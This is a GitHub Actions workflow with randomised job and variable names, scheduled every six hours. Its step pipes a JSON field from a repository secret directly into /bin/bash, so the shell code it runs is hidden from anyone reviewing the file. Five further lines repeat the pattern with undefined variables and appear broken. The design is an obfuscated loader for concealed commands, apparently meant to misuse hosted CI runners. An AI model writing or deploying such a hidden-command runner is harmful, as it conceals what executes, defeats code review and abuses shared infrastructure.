name: caoshouwang6475
on:
  workflow_dispatch:
  schedule:
    - cron: '25 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caoshouwang6475
        env:
          rjobj28: ${{ secrets.rjobj28 }}
        run: |
          echo $rjobj28 | jq -r .ezex6111 | /bin/bash
          echo $dg37 | jq -r .lmwt9156 | /bin/bash
          echo $opid0 | jq -r .ymtw5 | /bin/bash
          echo $e1428 | jq -r .yhidb0 | /bin/bash
          echo $auv10842 | jq -r .rln62 | /bin/bash
          echo $b7500 | jq -r .myuzc5 | /bin/bash

